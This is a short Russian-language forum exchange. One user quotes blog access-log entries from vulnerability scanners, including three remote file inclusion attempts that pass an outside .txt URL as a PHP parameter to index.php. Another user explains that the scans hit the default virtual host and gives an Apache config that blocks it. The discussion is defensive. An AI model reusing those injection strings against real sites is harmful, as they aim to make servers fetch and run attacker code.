Crew_7
Сегодня просматривая статистику обнаружил такие записи:
хttp://блог.com/ccbill/secure/ccbill.log
хttp://блог.com/cgi-bin/whereami.cgi
хttp://блог.com/editor/assetmanager/assetmanager.asp
хttp://блог.com/index.php?act=хttp://www.некто.hostwq.net/некто.txt?
хttp://блог.com/index.php?TWC=хttp://www.некто.hostwq.net/некто.txt?
хttp://блог.com/index.php?[Home]=хttp://www.некто.hostwq.net/некто.txt?
Pentarh
это когда домен виртуалхоста установлен как первый в списке конфига апача (он же дефолтный), что к нему можно обратиться по айпи
http://1.1.1.1/ - опа и вот тут твой блог (1.1.1.1 - айпи блога).
Тогда на этот айпи обрушивается туева хуча автоматических сканнеров уязвимостей. Это ты еще мало там увидел.
Чтобы такого не было, я лично первый виртуалхост устанавливаю примерно следующим:
Код:
<VirtualHost 1.1.1.1>
ServerName foobar
DocumentRoot /var/empty
<Directory /var/empty>
Order Deny,Allow
Deny from all
</Directory>
</VirtualHost>
То есть первый виртуалхост
на каждом айпишнике должен смотреть в пустую папку да еще и с запрещением просмотра.
Тогда пусть сканируют сколько им влезет.
Кстати много нового порой можно узнать, обратившись к своему серверу по
http://айпи ))